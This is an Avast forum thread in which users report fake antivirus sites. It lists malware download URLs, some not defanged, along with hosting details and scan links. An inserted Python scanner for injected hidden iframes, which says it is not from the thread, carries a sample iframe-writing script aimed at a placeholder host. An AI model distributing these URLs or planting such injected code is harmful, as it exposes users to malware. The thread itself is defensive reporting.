Avast WEBforum
Other => Viruses and worms => Topic started by: polonus on June 04, 2010, 09:37:53 PM
-
Hi malware fighters,
Fake-av found here:
Here is a complete list:
Threat Name: Trojan.FakeAV!gen24
Location: htxp://052a55.topwestsecure.com/download/DistAV_2013_b8.exe
Threat Name: Trojan.FakeAV!gen24
Location: htxp://f1e0c0.topwestsecure.com/download/DistAV_2013_b7.exe
Re: http://www.virustotal.com/analisis/f8ae332e594ad0ac2dcec58a9f3ad0f831b6d62ee4c0e0300d8df81e8548adde-1275605281
See: htxp://jsunpack.jeek.org/dec/go?report=8b7aed3a9e6d72e4b11f28a3673cc682296b3d54
Threat Name: Trojan.FakeAV!gen24
Location: htxp://ba38c4.topwestsecure.com/download/DistAV_2013_b8.exe
http://www.prevx.com/filenames/975799710197341493-X1/DISTAV_2013_B8%5B1%5D.EXE.html
See: http://www.browserdefender.com/site/topwestsecure.com/
Trend Micro: This URL is currently listed as malicious.
polonus
-
Thank you for the detailed information; detection and URL block will be in the next VPS update.
-
Hi malware fighters,
Another Polish fake av spreading site: shamanshop*pl
5 instances of it found:
Two redirects found there: 302 -> htxp://shamanshop.pl/sklep
301 -> hxtp://shamanshop.pl/sklep/
redirecting scheme: htxp://shamanshop.pl/ redirects to hxtp://shamanshop.pl/sklep
htxp://shamanshop.pl/sklep redirects to htxp://shamanshop.pl/sklep/
polonus
-
Another one here:
polonus
-
Hi malware fighters, another fake AV redirecting site to include..
2010-06-12 23:14:18 (GMT 1)
Website schuiling*net
Domain Hash 9c082f0a211d3fc7877cc13d7742c219
IP Address 69.89.22.118
IP Hostname box118.bluehost.com
IP Country US (United States)
AS Number 11798
AS Name BLUEHOST-AS - Bluehost Inc.
Detections 2 / 20 (10 %)
The site presents us with a double redirect, after a failure: <urlopen error no host given>
STATUS suspicious...
polonus
-
As always, good work, D. !!
Thanks, friend..!
asyn
-
The Fake scanner is gone, the redirect goes to CNN...... ???
-
And another recent one with 55 threats found,
polonus
-
Will also send you to CNN ..... :-\ ???
-
Will also send you to CNN ..... :-\ ???
CNN, the new haven of malware..?? ;D
asyn
-
Well Pondus,
I was redirected there twice going through the request in Malzilla; well, here is yesterday's score:
2010/06/11_07:42 firtullgone.com/uy/avs.exe 95.211.29.19 hosted-by.leaseweb.com. fake av Broupun Banker () / bofjosorupATmaila.com 16265
2010/06/11_07:42 wXw.fast-scanneronline.org/installer.0022.exe 91.188.60.3 - fake av Irving Roberson / robersonAThotmail.com 6851
This site is dangerous at 9 counts: http://www.urlvoid.com/scan/fast-scanneronline.org
2010/06/06_21:09 hibatavay.cn/pr.cgi?id=2979 188.72.225.187 city2007.com. fake av hahadelegeAT126.com 28753
2010/06/06_21:09 core2979.hibatavay.cn/d_advare_all.cgi?id=2979 188.72.225.187 city2007.com. fake av hahadelegeAT126.com 28753
2010/06/06_21:09 wXw.beautifulsecurityscan.com/ms03/ad 91.212.127.19 - fake av Robert Watkins robertwatkinsAThotmailbox.com 49087
2010/06/06_16:37 core2979.mylivejournalchanel.com/stget2.cgi?host=host&id=2979 173.212.245.90 173-212-245-90.hostnoc.net. fake av contactATprivacyprotect.org 21788
2010/06/06_16:37 core2979.davirijan.cn/d_advare_all.cgi?id=2979 188.72.225.187 city2007.com. fake av hahadelegeAT126.com 28753
pol
-
Will also send you to CNN ..... :-\ ???
CNN, the new haven of malware..?? ;D
asyn
Maybe malware news .... ;D
-
jepp. those contained malware. Already collected and submited ...... ;)
-
Maybe malware news .... ;D
Would be news worth to watch..! ;D
asyn
-
Hi Asyn,
This is the latest malware craze infected CNN adbanner code ;D
This is all in fun, but it is a reality that no code is left alone by the malcreants scheming yet another obfuscated injection scheme; the Internet is becoming a scary place for webmasters who want to keep their website's code clean,
polonus
-
...the Internet is becoming a scary place for webmasters who want to keep their website's code clean,
I know that only too well. ;)
asyn
-
Hi malware fighters,
Another one reported here:
Website westernwinds.net
Domain Hash f75afbc2b730096197625b5e49c7a496
IP Address 66.96.130.112 [SCAN]
IP Hostname 112.130.96.66.static.eigbox.net
IP Country US (United States)
AS Number 29873
AS Name BIZLAND-SD - The Endurance International Grou...
Detections 2 / 18 (11 %)
Status SUSPICIOUS
Redirecting to cnn.com again
Here is where it happens info: [decodingLevel=1] found JavaScript
error: line:4: SyntaxError: missing ] after element list:
error: line:4: [native code]
error: line:4: ................^
polonus
-
Hi malware fighters,
A recent list from Malware Domain List for fake av:
http://www.malwaredomainlist.com/mdl.php?search=fake+av&colsearch=All&quantity=50
One example given in here: spinpoll.com/iuqdx/qttbbm.php?ff=826284
results
http://scanner.novirusthanks.org/analysis/561d310ada76abefafa70c2afb1f7a10/cXR0YmJtLnBocA==/
http://wepawet.iseclab.org/view.php?hash=0372e8bf9a1d75e118b18830d4ea85fb&t=1276780197&type=js
Triggered code has been made unobtrusive and is legit here,
but the ways in which it can be exploited are obvious,
read: http://www.alstevens.co.uk/a-less-obtrusive-google-analytics-script/
How it was recently exploited, read here: http://blog.unmaskparasites.com/2009/03/26/google-analytics-is-an-intermediary-in-malware-distribution/
polonus
-
Hi malware fighters,
Here is a report about the way the malware is being injected via cross site scripting:
http://cyberinsecure.com/high-ranking-websites-spread-malware-through-cross-site-scripting-vulnerabilities/
It’s embedding iframes to redirect, and (quote) The last chunk of text is hexadecimal-encoded HTML that redirects users to ask5.eu (do not visit, see: http://www.siteadvisor.com/sites/ask5.eu ), and 1 suspicious inline script found, for this script see: http://jsunpack.jeek.org/dec/go?report=b413e5b967fa38a1d2dea332d601417ac034c41d with an undefined function parent.location.replace
to an apparent pr0n site...
A series of redirect links ultimately leads to a site that looks similar to a Microsoft Windows screen with a popup claiming the PC is overrun with malware. The user is prompted to download rogue anti-virus to fix the imaginary problem.
While it’s not the most convincing attack we’ve ever seen, there’s nothing to stop attackers from using the same technique to push web-based exploits, say the Adobe Reader zero-day attack that’s now circulating in the wild.
The links work because appleinsider.com and the rest of the sites being abused fail to filter out harmful characters used in XSS attacks. Here are a few examples with some of the malicious XSS advertisements (do not follow these or other “hxxp” URLs below): http://cyberinsecure.com/wp-content/uploads/2009/12/xss.png (click to enlarge)
(end of quote)
polonus
-
Fake AV,
A good read-up on the subject can be found here: http://www.usenix.org/event/leet10/tech/full_papers/Rajab.pdf
(advised by Google coders)
polonus
-
Hi malware fighters,
Another fake av site detected: versusspywareguard.com
Threat Name: HTTP Fake Antivirus WebPage Request 2
Location: htxp://6de46b37e.versusspywareguard.com/stream1/cacnpr/fhlcnalhnd/fcllfmfhdl.html
Threat Name: HTTP Fake Antivirus WebPage Request 2
Location: htxp://0639945.versusspywareguard.com/stream1/cafm/phddqcmrcc/fcllfmfral.html
Another source to look at from secubox labs: http://internetpol.fr/mw/
polonus
-
Hi malware fighters,
Another fake av site: rodaco.org
Domain Hash 94f43071befdbcaf02482e09e2a7a3ef
IP Address 66.96.131.89 [SCAN]
IP Hostname 89.131.96.66.static.eigbox.net
IP Country US (United States)
AS Number 29873
AS Name BIZLAND-SD - The Endurance International Group
polonus
-
Hi malware fighters,
And another one of the fake av drive-by-downloads detected here:
Threats found: 6
Here is a complete list:
polonus
-
Hi malware fighters,
Another one from Moldova:
Threats found: 58
Here a sample of them:
Virus
Threats found: 1. Analyzed this trojan further below...
Here is a complete list:
Threat Name: Downloader (avast now detects it as Win32:Downloader-ECU [Trj])
Location: htxp://zhengshu.osa.pl/zhengshu/zhengshuw.exe (other file is zhengshu.exe)
Infected with Mal/Downldr-AL
After scanning, 0/6 antivirus products detected that zhengshuw[1].exe contains a virus, trojan or suspicious risk! ... Is the content provided by the file encyclopedia not complete enough? Go to the forum now to discuss zhengshuw[1].exe >>
htxp://58.251.57.206/down?cid=3D228BFFBDF06C63A04E66BA3D14FB880FE1E892&t=2&fmt=&usrinput=%E6%9A%B4%E9%A3%8E%E5%BD%B1%E9%9F%B3&dt=2018000&ps=0_0&rt=0kbs&plt=0&spd=9
Is in this list: http://malwarepatrol.com.br/cgi/submit?action=list_mcf
http://www.prevx.com/filenames/719191126558992567-X1/ZHENGSHU.EXE.html
and
http://scanner.novirusthanks.org/analysis/35d82b779d33dd59129769d614465b86/emhlbmdzaHV3LmV4ZQ==/
See: http://wepawet.iseclab.org/view.php?hash=40910560e9eb16905f511b33a1355c7f&t=1279382964&type=js
and
http://www.virustotal.com/analisis/9469a349c50038c798801a0ba64d42f5e8c699c62a37c3d06f23db905e848018-1279279124
pol
-
Hi malware fighters,
Drive-By Downloads
Threats found: 25
Here is a sample:
Might have been removed!
polonus
-
Hi malware fighters,
Another one here: Threats found: 1
Here is a complete list:
Threat Name: Trojan.FakeAV
Location: htxp://trafok.in/modulesetup70700.exe
A dangerous website according to several sources: http://www.urlvoid.com/scan/trafok.in
Malzilla found this:
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
<!-- The padding to disable MSIE's friendly error page -->
With the avast shield that gave a JS:ScriptDC-inf[Trj] warning for a malware download,
And another one here:
See: http://www.urlvoid.com/scan/utu974.com
polonus
-
VirusTotal - modulesetup70700.exe - 11/42
http://www.virustotal.com/analisis/ef3df69693dc5906ee2b88e4ae134ff74eeb99298d19c27bde9367ef05cf8260-1281125582
and it is already in avast inbox..... ;)
-
Hi malware fighters,
Another one here:
Re: http://www.urlvoid.com/scan/wisneski.net
polonus
-
One more for your collection:
fotonpl.co.cc/a/exe.exe
-
The family from the above post:
fotonpl.co.cc/a/l.php
-
Hi malware fighters,
Another fake av detected here: Threat Name: Trojan.FakeAV (avast detects it as Win32:Trojan-gen)
Location: htxp://abodeflash-vol33.co.tv/om/ms.php
The site is infested with Mal/FakeAV-CX
Re: http://www.threatexpert.com/report.aspx?md5=57b1187f07968de0f2e203b70d972c5f
Chinese security info on this malcode: http://www.antivirus365.org/PCAntivirus/14112.html
http://vscan.urlvoid.com/analysis/670d26f0bda43fba8d3bdbf7f3442ffa/bXMtcGhw/
polonus
-
Hi another fake-av here:
Total threats found: Drive-By Downloads
Threats found: 27
e.g.
polonus
-
Detected e.g.: htxp://trafficplaza.co.uk/images/images/media/msg=8044.html
infected with JS/Tenia.b
and 366 other threats on mentioned domain:
See: http://www.virustotal.com/url-scan/report.html?id=3a6bb172f4a466cd37ef42c6fb8b827d-1300468922
See: http://www.virustotal.com/file-scan/report.html?id=9b11d70c2b1fccb35ad61f79529a2696a06f1d4b86cf1575c59ea3a78ef3a40f-1300472576
Unmask Parasites gives: the last time suspicious content was found at this site was on 2011-03-15.
Malicious software includes 8 scripting exploits.
This generic detection covers obfuscated scripts in which malicious iFrames are appended to the end of an HTML page, i.e. after the </HTML> tag.
Malicious software has been hosted on 1 domain, e.g. clint-eastwood dot cn/.
This site was hosted on 1 network including AS29671 (SERVAGE),
computer symptoms upon infection are:
frequent unexpected connections to unsafe domains,
newly added Registry keys or files, or Registry modifications,
the system always crashes for no man-made reason at all,
the memory of your system reduces unusually,
polonus
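The "iframe appended after the closing HTML tag" pattern described in the Unmask Parasites summary above is easy to check for on your own pages. Here is an added example (not code from the thread, from avast or from Unmask Parasites) that scans a saved page for content after the last `</html>`, for string-spliced tag names in an appended script, and for zero-size or invisible iframes; the two sample pages and the hostname EXAMPLE-BAD.invalid are constructed placeholders.

```python
import re
from typing import Dict, List

# Constructed sample, not taken from the thread: a legitimate page ends at </html>,
# and an injected script plus a hidden iframe have been appended after it.
# "EXAMPLE-BAD.invalid" is a placeholder hostname, not a real indicator.
INJECTED_HTML = """<html><head><title>Shop</title></head>
<body><p>Welcome to the shop.</p></body></html>
<script>document.write('<ifr'+'ame src="http://EXAMPLE-BAD.invalid/in.php" width="1" height="1" style="visibility:hidden"></ifr'+'ame>');</script>
<iframe src="http://EXAMPLE-BAD.invalid/x.php" width="0" height="0"></iframe>
"""

# Constructed clean page: a visible, normally sized iframe inside the body is not flagged.
CLEAN_HTML = """<html><head><title>Shop</title></head>
<body><p>Welcome to the shop.</p>
<iframe src="https://example.org/widget" width="300" height="200"></iframe>
</body></html>
"""

HTML_CLOSE = re.compile(r"</html\s*>", re.IGNORECASE)
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)
# 'ifr'+'ame' style string splicing keeps the literal tag name out of the page source
SPLICED_STRING = re.compile(r"""['"]\s*\+\s*['"]""")
# width/height of 0 or 1 (optionally "px") is the classic invisible-iframe sizing
ZERO_SIZE = re.compile(r"""\b(?:width|height)\s*=\s*["']?\s*[01](?:px)?\b""", re.IGNORECASE)
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)


def trailing_content(html: str) -> str:
    """Return whatever follows the last </html> tag; a clean page has only whitespace there."""
    closes = list(HTML_CLOSE.finditer(html))
    if not closes:
        return ""
    return html[closes[-1].end():]


def is_hidden_iframe(tag: str) -> bool:
    """An iframe sized 0/1 pixel or styled invisible has no legitimate reason to exist."""
    return bool(ZERO_SIZE.search(tag) or HIDDEN_STYLE.search(tag))


def scan_html(html: str) -> List[Dict[str, str]]:
    """Return a list of findings; each has a rule name and a short evidence excerpt."""
    findings: List[Dict[str, str]] = []
    tail = trailing_content(html)
    if tail.strip():
        findings.append({"rule": "content-after-html-close", "evidence": tail.strip()[:80]})
        # Scripts living after </html> that splice strings together are worth a closer look.
        for block in SCRIPT_BLOCK.finditer(tail):
            if SPLICED_STRING.search(block.group(0)):
                findings.append({"rule": "spliced-string-in-appended-script",
                                 "evidence": block.group(0)[:80]})
    # Hidden iframes are flagged wherever they sit, not only in the tail.
    for tag in IFRAME_TAG.finditer(html):
        if is_hidden_iframe(tag.group(0)):
            findings.append({"rule": "hidden-iframe", "evidence": tag.group(0)[:80]})
    return findings


def rules_hit(html: str) -> List[str]:
    """Convenience wrapper returning only the rule names, in order of discovery."""
    return [f["rule"] for f in scan_html(html)]


if __name__ == "__main__":
    for name, page in (("injected", INJECTED_HTML), ("clean", CLEAN_HTML)):
        print(name, rules_hit(page))
```

The check is deliberately simple (a whole-file regex pass) and will miss injections that rewrite the page before `</html>`, so treat a clean result as "nothing appended", not as "site clean".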
-
This one is not being detected, see over one hundred instances of Fake AV Website 5,
see: http://safeweb.norton.com/report/show?name=kylesheart.com
scanned this one at virustotal: htxp://kylesheart.com/zcobm.php?on=tekstovi%20pjesama
accompanying file scan: http://www.virustotal.com/file-scan/report.html?id=674faded451ce38bea28854cb4b4eb3790cd728dcc02b4eff07e181e9f511b68-1301086476
also see: http://safeweb.norton.com/buzz
polonus
-
Hi folks,
Another fake-av not detected by avast, resides here: htxp://ksu-antispyware.co.cc/fast-scan/
Detected here: http://www.virustotal.com/url-scan/report.html?id=7069774e14deabae6eaade4b11b85163-1302459072
file analysis, 3/ 42 (7.1%)
http://www.virustotal.com/file-scan/report.html?id=4536e20094bf07f94b28f9892997ea339387fb3fc4e0713e50c8793c0f873caf-1302466596
See Wepawet analysis: benign, but has a big chunk of obfuscated code,
ksu-antispyware.co.cc/fast-scan/
This online HTML scrambler/obfuscator was being used: http://www.voormedia.com/en/tools/html-obfuscate-scrambler.php
polonus
-
Hi folks,
Further info on: htxp://ksu-antispyware.co.cc/fast-scan/
Initially most likely "TROJAN.HTML.FRAUD!IK" will not appear because it is in IE temp. location,
but it will reveal itself with the proper cleansing routine...
Detected here by both Emsisoft and Ikarus, see: http://vscan.urlvoid.com/analysis/b76bcbe66e85fda63615359905b06bdc/ZmFzdC1zY2Fu/
Site is blacklisted here: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=ksu-antispyware.co.cc
and here as infected with Fake App Attack: Fake AV Notification Alert:
http://safeweb.norton.com/report/show?url=ksu-antispyware.co.cc
pol
-
See this analysis,
Suspicious: http://wepawet.iseclab.org/view.php?hash=d04433f971bfd8deefd0b9219a9a5c49&t=1302716752&type=js
Anubis report: http://anubis.iseclab.org/?action=result&task_id=1e848af371b5bec44a91fe827a1c5df39
See: http://www.virustotal.com/url-scan/report.html?id=91c838a06b3f196fa77983e640fd5b8b-1302716668
Not detected: http://www.virustotal.com/file-scan/report.html?id=cd9231daff32df82fb1894655cec052f20da2d5fe5d7e3a9c91ecc9160dc0d86-1302723871
polonus
-
New variants for the Antispy2011setup.exe
htxp://protectinstallxpvirusnow.com
htxp://protectxpscanvirus.com
Both are redirected from ads and Avast does not detect them. Ran into it twice on 2 separate websites.
-
I get a 404 on both of those...
Do you have the files, to add to the chest and send to avast?
-
The sites may have been brought down or changed.
When I got redirected to the site I got a prompt asking if I wanted to run or save Antispy2011setup.exe after it did the fake virus scan.
-
Exactly, and it is that file that is necessary for avast to get so that they can detect it...
Yes, blocking the site is all well and good, but give it a few hours and they have most likely moved on...but without the install file for this rogue, how will it be detected...
-
Exactly, and it is that file that is necessary for avast to get so that they can detect it...
Yes, blocking the site is all well and good, but give it a few hours and they have most likely moved on...but without the install file for this rogue, how will it be detected...
voting in avast! Web Rep :)
and hope an avast! Virus Researcher may do the job.
-
I was going to save the file to send it, but was not sure if it would self execute after it was saved.
-
I was going to save the file to send it, but was not sure if it would self execute after it was saved.
Ok, sorry, my comment did seem rather offhand...I would actually be inclined not to encourage users not to try and get the file unless they really know what they are doing...
The best thing to do would be to report the site while it is still active, which would then allow those who are comfortable to get the file. :)
-
Malware writers recode every day. There is no real purpose in posting this stuff. You can find all your malware links here.
http://malc0de.com/database/
http://www.malwaredomainlist.com/
-
If a rogue is reported, and submitted, and subsequently detected...protecting a user at some point or another then there is a purpose in posting...
-
Well, both those sites can give you more info than one person posting a link. Avast should just look at both those sites.
-
You both have a point there, spg SCOTT and Dieselman,
The malcreants start out by launching a new morphed, encrypted, obfuscated, protected version of the same malcreation. This is an ongoing battle between the malcreants and the anti-malware makers....
So the cybercriminals test out their new malcreations so they go under the anti-malware radar, right? What adds detection for 0-days etc. faster: re-scanning, re-scanning, re-scanning.
As soon as the undetected are flagged once, protection against them is possible. So I think reporting flagged malware sites and new rogues to avast (and sending the info to virus AT avast dot com too), and posting them to be re-scanned, is good. On the other hand this means protection "after the fact"; the vulnerability gap is still there and stays open. How to close this further: diminish the vulnerabilities used to infect by constantly updating the software of your OS and third-party programs (Secunia PSI), and use sandboxing and script protection to be even better protected,
polonus
-
Another undetected fake av site: htxp://protectionantivscanxp.com/ with mdl_fake AV (these servers often also has zeus/mdl_trojan TDSS on them)...usally they are being taken down rather quickly,
IP initial: see: http://www.ipillion.com/ip/91.213.157.110
Reported there as such: "protectxpdriversvirusnow" is a rogue antivirus site. I had a google redirection virus that kept directing me to that site. The virus apparently started with a 'tdl4 bootkit', as reporte...
as such not detected: http://www.virustotal.com/file-scan/report.html?id=40842d6f11294476776c1609562b3d979bfd1cbc90b6fac8154a213bf51cfcf6-1298142836
Not detected here: http://wepawet.iseclab.org/domain.php?hash=4317a555e95fd113218c188fdd150b85&type=js
But found to be dangerous here on 4 instances:
flagged by http://global.sitesafety.trendmicro.com/
polonus
-
Another one here: htxp://dl.antivirus-antispy.cw.cm/BestAntivirus2011.exe
5 detections for this TR/ATRAPS.Gen, see
http://www.virustotal.com/file-scan/report.html?id=4361036cada809073bca9b8b56f5b2b59e795099d5f1b567a8a5abe873431ea9-1303139492
Avast does not detect yet,
polonus
-
Another one here: htxp://dl.antivirus-antispy.cw.cm/BestAntivirus2011.exe
5 detections for this TR/ATRAPS.Gen, see
http://www.virustotal.com/file-scan/report.html?id=4361036cada809073bca9b8b56f5b2b59e795099d5f1b567a8a5abe873431ea9-1303139492
Avast does not detect yet,
polonus
You use malwaredomainlist,don't you? ;)
-
malc0de is also a great site for malware links.
http://malc0de.com/database/
-
Hi Dieselman,
We are not giving these sites here, because the unaware can get themselves infected; why do you post it then?
Make it htxp please. Same goes for others: unaware users should not go there unprotected, just as with jsunpack etc. etc.
polonus
-
Please read the link and the site before you comment. Malc0de is NOT a malicious site. It's just like Malware Domain List. Malc0de posts links to malicious sites for testing purposes, but the site itself is safe. Direct links to malicious sites should be coded with hxxp. But this is not a direct link. Clicking on the malc0de link will NOT directly get you infected. You are posting direct links. I, on the other hand, am not. Thanks.
-
Warning notice from MDL.
WARNING: All domains on this website should be considered dangerous. If you do
not know what you are doing here, it is recommended you leave right away. This
website is a resource for security professionals and enthusiasts
-
This looks like a new site for the Antispy2011.exe
hxxp:Memoryscannerprotectionwin.com
Got redirected to that site on another website not too long ago
-
Another Fake-av site hxxp://mbr-antivirus.ce.ms/fast-scan/
-
Another Fake-av site hxxp://mbr-antivirus.ce.ms/fast-scan/
Stopped by ClearCloud DNS.
-
This looks like a new site for the Antispy2011.exe
hxxp:Memoryscannerprotectionwin.com
Got redirected to that site on another website not too long ago
Link is dead.
-
I wonder if the people doing the fake AV sites are looking on this forum, seems odd the links go down as soon as someone mentions them.
This one is more recent:
hxxp:documentscannerprotectionwin.com
-
I wonder if the people doing the fake AV sites are looking on this forum, seems odd the links go down as soon as someone mentions them,
Most likely it would be gone regardless of what is posted here.
People behind these rogues are criminal ***wipes to whom I would love to introduce myself (in the most physical manner possible).
I'd love to call them stupid, but that would be false. They are savvy, and know how to stay on the move.
-
It looks like it is the same people. The "Scare" site always shows up as the same and tries to get you to install a program called Antispy2011.exe
I got no idea which Ad/Banners are doing it though
-
I went to the link again to see if it was down or up.. and it is up.. but the virus tried to install on my pc! but avast blocked the virus from downloading! Thank you so much avast! :)
-
Hi folks,
This one also not detected at VT:
hxtp://antivirus-program-2011.ce.ms/fast-scan
VT scan: http://www.virustotal.com/url-scan/report.html?id=9fa26859f2d3ca0d5485e60aeecf622f-1303732030
VT file scan:
http://www.virustotal.com/file-scan/report.html?id=8445f95b1231d462f181ce570023c501a3046a571e224947757d886f6f8095e1-1303739616
Strange to be found benign here: http://wepawet.iseclab.org/view.php?hash=9fa26859f2d3ca0d5485e60aeecf622f&t=1303739892&type=js
obfuscated and wrapped-protected online (see big chunk of obfuscated code)
see WOT warning: http://www.webutation.net/go/review/antivirus-program-2011.ce.ms
polonus
-
Hi folks,
This one also not detected at VT:
hxtp://antivirus-program-2011.ce.ms/fast-scan
VT scan: http://www.virustotal.com/url-scan/report.html?id=9fa26859f2d3ca0d5485e60aeecf622f-1303732030
VT file scan:
http://www.virustotal.com/file-scan/report.html?id=8445f95b1231d462f181ce570023c501a3046a571e224947757d886f6f8095e1-1303739616
Strange to be found benign here: http://wepawet.iseclab.org/view.php?hash=9fa26859f2d3ca0d5485e60aeecf622f&t=1303739892&type=js
obfuscated and wrapped-protected online (see big chunk of obfuscated code)
see WOT warning: http://www.webutation.net/go/review/antivirus-program-2011.ce.ms
polonus
and the Rogue is only detected by Prevx
http://www.virustotal.com/file-scan/report.html?id=9e05babb97a2bc788887e8c7fe63a8c3be1e12d6a89adb4102ca4f0825fa937e-1303743574
Malwarebytes detect it as - Trojan.FakeAlert.PGen
sample sent to avast ;) and SUPERAntiSpyware
-
Hi Pondus,
We are right on it, man, Kaspersky now also detects this as HEUR:Trojan.Win32.Generic,
see for the newer scan results:
http://www.virustotal.com/file-scan/report.html?id=9e05babb97a2bc788887e8c7fe63a8c3be1e12d6a89adb4102ca4f0825fa937e-1303743685 2 /42 (4.8%)
pol
P.S. We need to have this detection added, because this malware is destructive to system32 files and then the computer will not start up anymore, meaning a re-install,
D
-
and Norman but signature is not released yet - Already detected as W32/Crypt.AVFO
-
Hi Pondus,
Another one not detected by avast and norman:
Fake av at hxtp://getip-string02.tk/
VT scan: http://www.virustotal.com/url-scan/report.html?id=7e7ce8aa583331ce372ae657dae41a69-1303831762
detected by Bitdefender...
VT file scan: http://www.virustotal.com/file-scan/report.html?id=465186de9157139f2197a618cda2c461790fa5c52ec3ab68dcc114deb180f7df-1303839353 3/ 41 (7.3%)
polonus
-
and not detected by Malwarebytes
will send sample ;)
EDIT: the rogue is detected by avast
http://www.virustotal.com/file-scan/report.html?id=779abf32ddcad236c09d9937b988332ee4631990a76cd1ac7ca0087a4e9dc08d-1303839832
-
Is this a fake av? Scanned here: http://wepawet.iseclab.org/view.php?hash=3387298540e82cf340508865a49b26b8&t=1303856097&type=js
VT url analysis: http://www.virustotal.com/url-scan/report.html?id=3387298540e82cf340508865a49b26b8-1303849006
VT file analysis: http://www.virustotal.com/file-scan/report.html?id=4193f2ef35f027d3947705aab2aa6f8e8aeb84220d9383123d3f48f063ed0da3-1303856209 not detected
See: http://vscan.urlvoid.com/file/bdd6fcfdfc7b324724e5a101c7c3b908/YWxlcnRzLWNsaWVudC1hbGVydHNjbGllbnQtc2gt/
Detected as dangerous site on 3 instances: http://www.urlvoid.com/scan/instantspywareremoval.com
polonus
-
Is this a fake av? Scanned here: http://wepawet.iseclab.org/view.php?hash=3387298540e82cf340508865a49b26b8&t=1303856097&type=js
VT url analysis: http://www.virustotal.com/url-scan/report.html?id=3387298540e82cf340508865a49b26b8-1303849006
VT file analysis: http://www.virustotal.com/file-scan/report.html?id=4193f2ef35f027d3947705aab2aa6f8e8aeb84220d9383123d3f48f063ed0da3-1303856209 not detected
See: http://vscan.urlvoid.com/file/bdd6fcfdfc7b324724e5a101c7c3b908/YWxlcnRzLWNsaWVudC1hbGVydHNjbGllbnQtc2gt/
Detected as dangerous site on 3 instances: http://www.urlvoid.com/scan/instantspywareremoval.com
polonus
Polonus, I have a quick question.. If I got a pop up to download the program on instantspywareremoval, does that mean I have a virus? Or is the program safe?
-
Is this a fake av? Scanned here: http://wepawet.iseclab.org/view.php?hash=3387298540e82cf340508865a49b26b8&t=1303856097&type=js
VT url analysis: http://www.virustotal.com/url-scan/report.html?id=3387298540e82cf340508865a49b26b8-1303849006
VT file analysis: http://www.virustotal.com/file-scan/report.html?id=4193f2ef35f027d3947705aab2aa6f8e8aeb84220d9383123d3f48f063ed0da3-1303856209 not detected
See: http://vscan.urlvoid.com/file/bdd6fcfdfc7b324724e5a101c7c3b908/YWxlcnRzLWNsaWVudC1hbGVydHNjbGllbnQtc2gt/
Detected as dangerous site on 3 instances: http://www.urlvoid.com/scan/instantspywareremoval.com
polonus
The website you listed looks like it wants people to download PCSafeDoctor. I searched Google and found a website that has PCSafeDoctor on it also: hxxp://www.pcsafedoctor.com/ I wonder if the program is malware or not.
-
You may ask in the Malwarebytes forum....they usually know...if not, they are quick to find out
-
Concerning pcsafedoctor, re: http://www.mywot.com/en/forum/11030-pcsafedoctor
polonus
-
My friend on twitter Asked @Microsofthelps about instantspywareremoval site and Here is their tweet about the program.
http://twitter.com/#!/MicrosoftHelps/status/63258439857602560
-
Is this a fake av? Scanned here: http://wepawet.iseclab.org/view.php?hash=3387298540e82cf340508865a49b26b8&t=1303856097&type=js
VT url analysis: http://www.virustotal.com/url-scan/report.html?id=3387298540e82cf340508865a49b26b8-1303849006
VT file analysis: http://www.virustotal.com/file-scan/report.html?id=4193f2ef35f027d3947705aab2aa6f8e8aeb84220d9383123d3f48f063ed0da3-1303856209 not detected
See: http://vscan.urlvoid.com/file/bdd6fcfdfc7b324724e5a101c7c3b908/YWxlcnRzLWNsaWVudC1hbGVydHNjbGllbnQtc2gt/
Detected as dangerous site on 3 instances: http://www.urlvoid.com/scan/instantspywareremoval.com
polonus
The website you listed looks like it wants people to download PCSafeDoctor. I searched Google and found a website that has PCSafeDoctor on it also: hxxp://www.pcsafedoctor.com/ I wonder if the program is malware or not.
You will never be infected by downloading malware to your computer; the only way that it can infect your computer is if you execute the application. You can save all the malware you want to one folder on your computer, and you won't be infected. You can visit an exploited web site (fake av warnings in this case) and the site tells you that it found infected files on your computer, but these warnings are fake and your computer is not really infected. Of course, there are exploits that are able to infect you without your consent; this happens when you have your programs and OS out of date. These opportunities are known as "vulnerabilities".
-
Hi Llanziek,
Read this here: PCSafeDoctor - http://www.mywot.com/en/forum/11030-pcsafedoctor
The program can detect but for cleansing you need a paid version,
polonus
-
Hi Llanziek,
Read this here: PCSafeDoctor - http://www.mywot.com/en/forum/11030-pcsafedoctor
The program can detect but for cleansing you need a paid version,
polonus
That's right. I experienced similar situations with AdwareAlert and SpywareCease. The difference among fake av applications is that some are less annoying, and some do not take complete control of the computer (like the above mentioned, convincing people that the application is safe and real).
-
Most of the ones I have been getting are targeted for Windows XP/Vista
-
See: http://wepawet.iseclab.org/view.php?hash=7ba4727cec0c40dde931c239ccb66e72&t=1304424653&type=js
Nothing detected....
From the same domain: Trojan FakeAlert. Rogue AV ' Security Shield ', see:
VT scan: http://www.virustotal.com/file-scan/report.html?id=8ed62f6f3bed2e23d1eec91ab1d85c9078423bbcea89b3a80b91669444e1e842-1304338934 aka variant of Win32/Kryptik.NGV
see: http://vscan.urlvoid.com/file/3cb045915778215e2fced65afb8434d7/aW5kZXgtcGhw/
decode error on file download....f608b4d5a024e24c409a44da09262497 194 bytes...
polonus
-
First the VT scans: http://www.virustotal.com/url-scan/report.html?id=622c3c5f1eae6092b6615ddd6a0fd2d0-1305572964
accompanying file scan: http://www.virustotal.com/file-scan/report.html?id=25d2f1db7ea4c2d45daed3aa23cb6dd4851b486bfc41e597af8441be2cbd4e62-1305580168 *
Wepawet scan gives suspicious result: http://wepawet.iseclab.org/view.php?hash=622c3c5f1eae6092b6615ddd6a0fd2d0&t=1305580186&type=js
and the resulting Anubis report link: http://anubis.iseclab.org/?action=result&task_id=1ffa81154a0026d74659bfc1da253c252
But it could also be the UPX packer protection being heuristically flagged by 2 scanners, see *,
here given clean: http://www.garyshood.com/virus/results.php?r=12881e2b85f03b0893835d8dc1c5ed68
polonus
sent to virus AT avast com
-
So it is malware that avast did not detect: http://www.virustotal.com/file-scan/report.html?id=25d2f1db7ea4c2d45daed3aa23cb6dd4851b486bfc41e597af8441be2cbd4e62-1305690639 now 8 /43 (18.6%)
